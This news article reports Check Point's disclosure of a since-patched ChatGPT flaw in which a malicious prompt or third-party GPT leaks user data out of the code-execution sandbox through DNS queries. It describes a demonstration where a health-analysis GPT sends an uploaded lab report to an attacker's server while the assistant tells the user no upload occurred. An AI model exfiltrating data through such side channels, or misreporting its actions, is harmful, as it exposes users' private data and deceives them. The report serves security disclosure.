OpenAI patches ChatGPT flaw that smuggled data over DNS

The Register / 3/31/2026

📰 NewsDeveloper Stack & InfrastructureSignals & Early TrendsIndustry & Market Moves

Key Points

  • OpenAI has released a patch for a ChatGPT vulnerability that could be used to smuggle data out via DNS queries.
  • The issue is described as bypassing typical outbound web-traffic controls because the exfiltration path used DNS rather than HTTP/HTTPS.
  • Security vendor Check Point reportedly noted that while outbound controls blocked web traffic, DNS traffic was overlooked and could still carry the data.
  • The incident underscores the need for organizations to monitor and restrict not just web protocols but also DNS and other “side-channel” egress paths.
  • The update is positioned as a security fix for potential data leakage, highlighting ongoing hardening work around LLM platforms’ network exposure.

OpenAI patches ChatGPT flaw that smuggled data over DNS

Check Point says outbound controls blocked web traffic but overlooked DNS

Mon 30 Mar 2026 // 19:36 UTC

OpenAI talks up data security for its AI services, yet Check Point says that ChatGPT allowed data to leak through a DNS side channel before the flaw was fixed.

In February, the free-spending AI biz fixed a data exfiltration vulnerability in ChatGPT that allowed a single prompt to bypass the notional safeguards OpenAI had put in place.

"We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation," researchers from Check Point said in a blog post on Monday.

It's not supposed to be that easy. OpenAI has implemented various safeguards around ChatGPT to limit data exfiltration by the various tools it can use. For example, the company says, "The ChatGPT code execution environment is unable to generate outbound network requests directly."

But Check Point researchers found that wasn't entirely correct.

"The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis," the researchers said. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation."

That side channel? The Domain Name System (DNS), which resolves domain names into IP addresses.

The Check Point security bods explain that, while OpenAI prevents ChatGPT from communicating with the internet without authorization, it didn't have any controls on data smuggled via DNS.

The security biz created three proof-of-concept attacks that show how this side channel might be abused. One involved a "GPT," a third-party app implementing ChatGPT APIs, that served as a personal health analyst. 

In the demonstration, a user uploaded a PDF containing laboratory results and personal information for the GPT to interpret. The app did so, and when asked whether it had uploaded the data, "ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location."

Nonetheless, the GPT app transmitted the data to a remote server controlled by the attacker.

Flaws like this suggest serious implications for regulated industries that deploy AI services. Were a corporate AI service to leak this sort of data, it could be a GDPR violation, a HIPAA breach, or could run afoul of various financial compliance rules.

OpenAI is said to have fixed this particular issue on February 20, 2026. The AI biz did not immediately respond to a request for comment. ®

More like these
×

Narrower topics

More about

More like these
×

Narrower topics

TIP US OFF

Send us news